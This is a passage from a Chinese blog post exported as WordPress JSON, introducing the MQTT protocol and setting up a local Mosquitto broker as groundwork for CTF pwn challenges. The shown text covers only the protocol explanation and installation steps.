{"id":768,"date":"2025-11-09T00:26:00","date_gmt":"2025-11-08T16:26:00","guid":{"rendered":"http:\/\/39.104.51.85\/?p=768"},"modified":"2026-01-04T18:10:32","modified_gmt":"2026-01-04T10:10:32","slug":"mqtt-pwn%e5%88%9d%e6%8e%a2","status":"publish","type":"post","link":"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/","title":{"rendered":"MQTT-pwn\u521d\u63a2"},"content":{"rendered":"\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_69_1 counter-hierarchy ez-toc-counter ez-toc-custom ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title \" >\u5185\u5bb9<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#MQTT%E8%AE%B2%E8%A7%A3\" title=\"MQTT\u8bb2\u89e3\">MQTT\u8bb2\u89e3<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E5%8D%8F%E8%AE%AE%E5%8E%9F%E7%90%86\" title=\"\u534f\u8bae\u539f\u7406\">\u534f\u8bae\u539f\u7406<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E5%8F%91%E5%B8%83%E8%80%85-Publisher\" title=\"\u53d1\u5e03\u8005 (Publisher)\">\u53d1\u5e03\u8005 (Publisher)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E4%BB%A3%E7%90%86%E6%9C%8D%E5%8A%A1%E5%99%A8%EF%BC%88broker%EF%BC%89\" title=\"\u4ee3\u7406\/\u670d\u52a1\u5668\uff08broker\uff09\">\u4ee3\u7406\/\u670d\u52a1\u5668\uff08broker\uff09<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E8%AE%A2%E9%98%85%E8%80%85%EF%BC%88Subscribe%EF%BC%89\" title=\"\u8ba2\u9605\u8005\uff08Subscribe\uff09\">\u8ba2\u9605\u8005\uff08Subscribe\uff09<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E5%AE%A2%E6%88%B7%E7%AB%AF%EF%BC%88Client%EF%BC%89\" title=\"\u5ba2\u6237\u7aef\uff08Client\uff09\">\u5ba2\u6237\u7aef\uff08Client\uff09<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E7%A4%BA%E6%84%8F%E5%9B%BE\" title=\"\u793a\u610f\u56fe\">\u793a\u610f\u56fe<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE\" title=\"\u73af\u5883\u914d\u7f6e\">\u73af\u5883\u914d\u7f6e<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#1%E4%BD%BF%E7%94%A8%E5%AE%89%E8%A3%85-Mosquitto-MQTT\" title=\"1.\u4f7f\u7528\u5b89\u88c5 Mosquitto MQTT\">1.\u4f7f\u7528\u5b89\u88c5 Mosquitto MQTT<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#2%E5%90%AF%E5%8A%A8%E6%9C%8D%E5%8A%A1%E5%B9%B6%E8%AE%BE%E7%BD%AE%E5%BC%80%E6%9C%BA%E8%87%AA%E5%90%AF\" title=\"2.\u542f\u52a8\u670d\u52a1\u5e76\u8bbe\u7f6e\u5f00\u673a\u81ea\u542f\">2.\u542f\u52a8\u670d\u52a1\u5e76\u8bbe\u7f6e\u5f00\u673a\u81ea\u542f<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#3%E9%85%8D%E7%BD%AEconf\" title=\"3.\u914d\u7f6econf\">3.\u914d\u7f6econf<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E4%B8%8B%E8%BD%BDmqttx\" title=\"\u4e0b\u8f7dmqttx\">\u4e0b\u8f7dmqttx<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#python%E4%BD%BF%E7%94%A8mqtt\" title=\"python\u4f7f\u7528mqtt\">python\u4f7f\u7528mqtt<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E5%8F%91%E9%80%81%E7%AB%AF\" title=\"\u53d1\u9001\u7aef\">\u53d1\u9001\u7aef<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E6%8E%A5%E6%94%B6%E7%AB%AF\" title=\"\u63a5\u6536\u7aef\">\u63a5\u6536\u7aef<\/a><\/li><\/ul><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-16\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E4%BE%8B%E9%A2%98%E8%AE%B2%E8%A7%A3\" title=\"\u4f8b\u9898\u8bb2\u89e3\">\u4f8b\u9898\u8bb2\u89e3<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-17\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#CISCN2025%E2%80%94%E2%80%94final-mqtt\" title=\"CISCN2025\u2014\u2014final mqtt\">CISCN2025\u2014\u2014final mqtt<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-18\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90\" title=\"\u9898\u76ee\u5206\u6790\">\u9898\u76ee\u5206\u6790<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-19\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#exp\" title=\"exp\">exp<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-20\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#TPCTF%E2%80%94%E2%80%94smart-door-lock\" title=\"TPCTF\u2014\u2014smart_door_lock\">TPCTF\u2014\u2014smart_door_lock<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-21\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E6%BA%90%E7%A0%81%E5%AD%A6%E4%B9%A0\" title=\"\u6e90\u7801\u5b66\u4e60\">\u6e90\u7801\u5b66\u4e60<\/a><ul class='ez-toc-list-level-4' ><li class='ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-22\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#maincpp\" title=\"main.cpp\">main.cpp<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-23\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#door-lockh\" title=\"door_lock.h\">door_lock.h<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-24\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#door-lockcpp\" title=\"door_lock.cpp\">door_lock.cpp<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-25\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E5%A6%82%E4%BD%95%E8%B0%83%E8%AF%95\" title=\"\u5982\u4f55\u8c03\u8bd5\">\u5982\u4f55\u8c03\u8bd5<\/a><ul class='ez-toc-list-level-4' ><li class='ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-26\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E5%87%86%E5%A4%87gdbserver\" title=\"\u51c6\u5907gdbserver\">\u51c6\u5907gdbserver<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-27\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E4%BF%AE%E6%94%B9%E5%90%AF%E5%8A%A8%E8%84%9A%E6%9C%AC\" title=\"\u4fee\u6539\u542f\u52a8\u811a\u672c\">\u4fee\u6539\u542f\u52a8\u811a\u672c<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-28\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E4%BC%A0%E8%BE%93gdbserver\" title=\"\u4f20\u8f93gdbserver\">\u4f20\u8f93gdbserver<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-29\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#gdbserver%E9%99%84%E5%8A%A0%E5%88%B0%E7%8E%B0%E6%9C%89%E8%BF%9B%E7%A8%8B\" title=\"gdbserver\u9644\u52a0\u5230\u73b0\u6709\u8fdb\u7a0b\">gdbserver\u9644\u52a0\u5230\u73b0\u6709\u8fdb\u7a0b<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-30\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#EXP%E8%AE%B2%E8%A7%A3\" title=\"EXP\u8bb2\u89e3\">EXP\u8bb2\u89e3<\/a><ul class='ez-toc-list-level-4' ><li class='ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-31\" href=\"http:\/\/39.104.51.85\/index.php\/2025\/11\/09\/mqtt-pwn%e5%88%9d%e6%8e%a2\/#%E5%AE%8C%E6%95%B4EXP%E5%A6%82%E4%B8%8B\" title=\"\u5b8c\u6574EXP\u5982\u4e0b\">\u5b8c\u6574EXP\u5982\u4e0b<\/a><\/li><\/ul><\/li><\/ul><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h1 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"MQTT%E8%AE%B2%E8%A7%A3\"><\/span>MQTT\u8bb2\u89e3<span class=\"ez-toc-section-end\"><\/span><\/h1>\n\n\n\n<p>MQTT\uff08Message Queuing Telemetry Transport\uff0c\u6d88\u606f\u961f\u5217\u9065\u6d4b\u4f20\u8f93\u534f\u8bae\uff09\uff0c\u662f\u4e00\u79cd\u57fa\u4e8e\u53d1\u5e03\/\u8ba2\u9605\uff08publish\/subscribe\uff09\u6a21\u5f0f\u7684\u201c\u8f7b\u91cf\u7ea7\u201d\u901a\u8baf\u534f\u8bae\uff0c\u8be5\u534f\u8bae\u6784\u5efa\u4e8eTCP\/IP\u534f\u8bae\u4e0a\uff0c\u7531IBM\u57281999\u5e74\u53d1\u5e03\u3002<\/p>\n\n\n\n<p>MQTT\u6700\u5927\u4f18\u70b9\u5728\u4e8e\uff0c\u7528\u6781\u5c11\u7684\u4ee3\u7801\u548c\u6709\u9650\u7684\u5e26\u5bbd\uff0c\u4e3a\u8fde\u63a5\u8fdc\u7a0b\u8bbe\u5907\u63d0\u4f9b\u5b9e\u65f6\u53ef\u9760\u7684\u6d88\u606f\u670d\u52a1\u3002<\/p>\n\n\n\n<p>\u4f5c\u4e3a\u4e00\u79cd\u4f4e\u5f00\u9500\u3001\u4f4e\u5e26\u5bbd\u5360\u7528\u7684\u5373\u65f6\u901a\u8baf\u534f\u8bae\uff0c\u4f7f\u5176\u5728\u7269\u8054\u7f51\u3001\u5c0f\u578b\u8bbe\u5907\u3001\u79fb\u52a8\u5e94\u7528\u7b49\u65b9\u9762\u6709\u8f83\u5e7f\u6cdb\u7684\u5e94\u7528\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%8D%8F%E8%AE%AE%E5%8E%9F%E7%90%86\"><\/span>\u534f\u8bae\u539f\u7406<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u5b9e\u73b0MQTT\u534f\u8bae\u9700\u8981\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u5668\u7aef\u901a\u8baf\u5b8c\u6210\uff0c\u5728\u901a\u8baf\u8fc7\u7a0b\u4e2d\uff0cMQTT\u534f\u8bae\u4e2d\u6709\u4e09\u79cd\u8eab\u4efd\uff1a\u53d1\u5e03\u8005\uff08Publish\uff09\u3001\u4ee3\u7406\uff08Broker\uff09\uff08\u670d\u52a1\u5668\uff09\u3001\u8ba2\u9605\u8005\uff08Subscribe\uff09\u3002\u5176\u4e2d\uff0c\u6d88\u606f\u7684\u53d1\u5e03\u8005\u548c\u8ba2\u9605\u8005\u90fd\u662f\u5ba2\u6237\u7aef\uff0c\u6d88\u606f\u4ee3\u7406\u662f\u670d\u52a1\u5668\uff0c\u6d88\u606f\u53d1\u5e03\u8005\u53ef\u4ee5\u540c\u65f6\u662f\u8ba2\u9605\u8005\u3002<\/p>\n\n\n\n<p>MQTT\u4f20\u8f93\u7684\u6d88\u606f\u5206\u4e3a\uff1a\u4e3b\u9898\uff08Topic\uff09\u548c\u8d1f\u8f7d\uff08payload\uff09\u4e24\u90e8\u5206\uff1a<\/p>\n\n\n\n<p>\uff081\uff09Topic\uff0c\u53ef\u4ee5\u7406\u89e3\u4e3a\u6d88\u606f\u7684\u7c7b\u578b\uff0c\u8ba2\u9605\u8005\u8ba2\u9605\uff08Subscribe\uff09\u540e\uff0c\u5c31\u4f1a\u6536\u5230\u8be5\u4e3b\u9898\u7684\u6d88\u606f\u5185\u5bb9\uff08payload\uff09\uff1b<br>\uff082\uff09payload\uff0c\u53ef\u4ee5\u7406\u89e3\u4e3a\u6d88\u606f\u7684\u5185\u5bb9\uff0c\u662f\u6307\u8ba2\u9605\u8005\u5177\u4f53\u8981\u4f7f\u7528\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%8F%91%E5%B8%83%E8%80%85-Publisher\"><\/span><strong>\u53d1\u5e03\u8005 (Publisher)<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u529f\u80fd\uff1a \u8d1f\u8d23\u4ea7\u751f\u6570\u636e\u548c\u6d88\u606f\uff0c\u5e76\u5c06\u8fd9\u4e9b\u6307\u5b9atopic\u7684\u6d88\u606f\u53d1\u9001\uff08\u53d1\u5e03\/Publish\uff09\u5230 Broker\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E4%BB%A3%E7%90%86%E6%9C%8D%E5%8A%A1%E5%99%A8%EF%BC%88broker%EF%BC%89\"><\/span>\u4ee3\u7406\/\u670d\u52a1\u5668\uff08broker\uff09 <span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u53ef\u4ee5\u7406\u89e3\u4e3a\u63d0\u4f9b mqtt \u670d\u52a1\u7684\u4ee3\u7406\u670d\u52a1\u5668 \uff0c\u901a\u4fd7\u4e00\u70b9\u6765\u8bb2\u5c31\u662f\u201d\u90ae\u5c40\u201d\u6216\u8005\u8bf4\u662f\u201d\u6d88\u606f\u4e2d\u8f6c\u4e2d\u5fc3\u201d\uff0c\u6bcf\u4e2a client \u4e4b\u95f4\u7684\u901a\u4fe1\u90fd\u5fc5\u987b\u901a\u8fc7 Broker \u6765\u8fdb\u884c\u3002<br>\u7b80\u5355\u6765\u8bf4\uff0cBroker\u5c31\u662f\u4e00\u4e2a\u4e2d\u95f4\u4eba\uff0c\u8d1f\u8d23\u7ba1\u7406\u6240\u6709\u5ba2\u6237\u7aef\u7684\u8fde\u63a5\uff0c\u5e76\u786e\u4fdd\u6d88\u606f\u80fd\u591f\u4ece\u4e00\u4e2a\u5ba2\u6237\u7aef\u5b89\u5168\u3001\u9ad8\u6548\u5730\u4f20\u9012\u5230\u53e6\u4e00\u4e2a\u6216\u591a\u4e2a\u5ba2\u6237\u7aef\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E8%AE%A2%E9%98%85%E8%80%85%EF%BC%88Subscribe%EF%BC%89\"><\/span>\u8ba2\u9605\u8005\uff08Subscribe\uff09<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u529f\u80fd\uff1a \u8d1f\u8d23\u63a5\u6536\u5b83\u611f\u5174\u8da3\u7684\u6d88\u606f\u3002\u5b83\u4f1a\u63d0\u524d\u544a\u8bc9Broker\u5b83\u5bf9\u54ea\u4e2a\u201d\u4e3b\u9898\u201d\uff08Topic\uff09\u7684\u6d88\u606f\u611f\u5174\u8da3\uff08\u8fd9\u4e2a\u884c\u4e3a\u53eb\u505a\u8ba2\u9605\/Subscribe\uff09\uff0c\u5c31\u4f1a\u63a5\u6536\u8ba2\u9605\u76f8\u540ctopic\u7684client\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%AE%A2%E6%88%B7%E7%AB%AF%EF%BC%88Client%EF%BC%89\"><\/span><strong>\u5ba2\u6237\u7aef<\/strong>\uff08<strong>Client<\/strong>\uff09<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u5ba2\u6237\u7aef\u53ef\u4ee5\u5145\u5f53\u53d1\u5e03\u8005\uff0c\u4e5f\u53ef\u4ee5\u5145\u5f53\u8ba2\u9605\u8005\uff0c\u4e5f\u53ef\u4ee5\u540c\u65f6\u5145\u5f53\u4e24\u4e2a\u89d2\u8272<\/p>\n\n\n\n<p>Client \u662f\u6307\u4efb\u4f55\u8fde\u63a5\u5230 Broker \u7684\u8bbe\u5907\u6216\u5e94\u7528\u7a0b\u5e8f \uff0c\u53ef\u4ee5\u7406\u89e3\u4e3a\u201d\u5bc4\u4fe1\u4eba\u201d\u548c\u201d\u6536\u4fe1\u4eba\u201d\u3002\u5728\u7269\u8054\u7f51\u573a\u666f\u4e2d\uff0c\u4e00\u4e2a&nbsp;<code>Client<\/code>&nbsp;\u53ef\u4ee5\u662f\u4e00\u4e2a\u6e29\u5ea6\u4f20\u611f\u5668\u3001\u4e00\u4e2a\u667a\u80fd\u706f\u6ce1\u3001\u4e00\u90e8\u624b\u673a\u4e0a\u7684App\uff0c\u6216\u8005\u662f\u4e00\u4e2a\u5728\u670d\u52a1\u5668\u4e0a\u8fd0\u884c\u7684\u6570\u636e\u5206\u6790\u7a0b\u5e8f\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"msg_header_h3_2\"><span class=\"ez-toc-section\" id=\"%E7%A4%BA%E6%84%8F%E5%9B%BE\"><\/span>\u793a\u610f\u56fe<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>client1\uff0c2\uff0c3\uff0c4\u540c\u65f6\u8fde\u63a5broker\uff0cclient1\uff0c2\uff0c3\u8ba2\u9605topic&#8221;diag&#8221; ,\u8fd9\u65f6client4\u53d1\u9001topic\u4e3a&#8221;diag&#8221; msg=&#8221;hello&#8221;\u7ed9broker\uff0cbroker\u4f1a\u5411\u540c\u65f6\u8ba2\u9605topic=&#8221;diag&#8221;\u7684client1\uff0c2\uff0c3\u53d1\u9001\u8fd9\u4e2a\u6d88\u606f\uff08\u56fe\u6e90\uff1a<a href=\"https:\/\/bbs.kanxue.com\/thread-287727.htm\">[\u539f\u521b]mqtt \u534f\u8baepwn\u5165\u95e8\uff08ciscn2025 final mqtt\uff09-Pwn-\u770b\u96ea\u8bba\u575b-\u5b89\u5168\u793e\u533a|\u975e\u8425\u5229\u6027\u8d28\u6280\u672f\u4ea4\u6d41\u793e\u533a<\/a>\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/1010243_TEDZ9XKRFRWRRA3.webp'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1142\" height=\"661\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/1010243_TEDZ9XKRFRWRRA3.webp\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-794\"  sizes=\"(max-width: 1142px) 100vw, 1142px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE\"><\/span>\u73af\u5883\u914d\u7f6e<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"1%E4%BD%BF%E7%94%A8%E5%AE%89%E8%A3%85-Mosquitto-MQTT\"><\/span>1.\u4f7f\u7528\u5b89\u88c5 Mosquitto MQTT<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">sudo apt update<br>sudo apt install mosquitto mosquitto-clients<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"2%E5%90%AF%E5%8A%A8%E6%9C%8D%E5%8A%A1%E5%B9%B6%E8%AE%BE%E7%BD%AE%E5%BC%80%E6%9C%BA%E8%87%AA%E5%90%AF\"><\/span>2.\u542f\u52a8\u670d\u52a1\u5e76\u8bbe\u7f6e\u5f00\u673a\u81ea\u542f<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo systemctl enable mosquitto\nsudo systemctl start mosquitto<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"3%E9%85%8D%E7%BD%AEconf\"><\/span>3.\u914d\u7f6econf<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo vim \/etc\/mosquitto\/mosquitto.conf<\/code><\/pre>\n\n\n\n<p>\u5728\u6587\u4ef6\u4e2d\u6dfb\u52a0<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>listener 1883 #\u8bbe\u7f6e\u76d1\u542c\u7aef\u53e3\u4e3a 1883\nallow_anonymous true  # \u53ef\u9009\uff0c\u5141\u8bb8\u533f\u540d\u8bbf\u95ee\uff08\u9ed8\u8ba4\uff09<\/code><\/pre>\n\n\n\n<p>\u6441\u201cEsc\u201d+\u201c\uff1awq\u201d\u9000\u51fa\u540e\u7ec8\u7aef\u8f93\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo systemctl restart mosquitto # \u91cd\u542f\u670d\u52a1<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-27.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"901\" height=\"541\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-27.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-770\"  sizes=\"(max-width: 901px) 100vw, 901px\" \/><\/div><\/figure>\n\n\n\n<p>netstat -lnvp\u67e5\u770b\u4e00\u4e0b\uff0c\u53ef\u4ee5\u770b\u52301883\u7aef\u53e3\u5df2\u7ecf\u5f00\u59cb\u76d1\u542c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 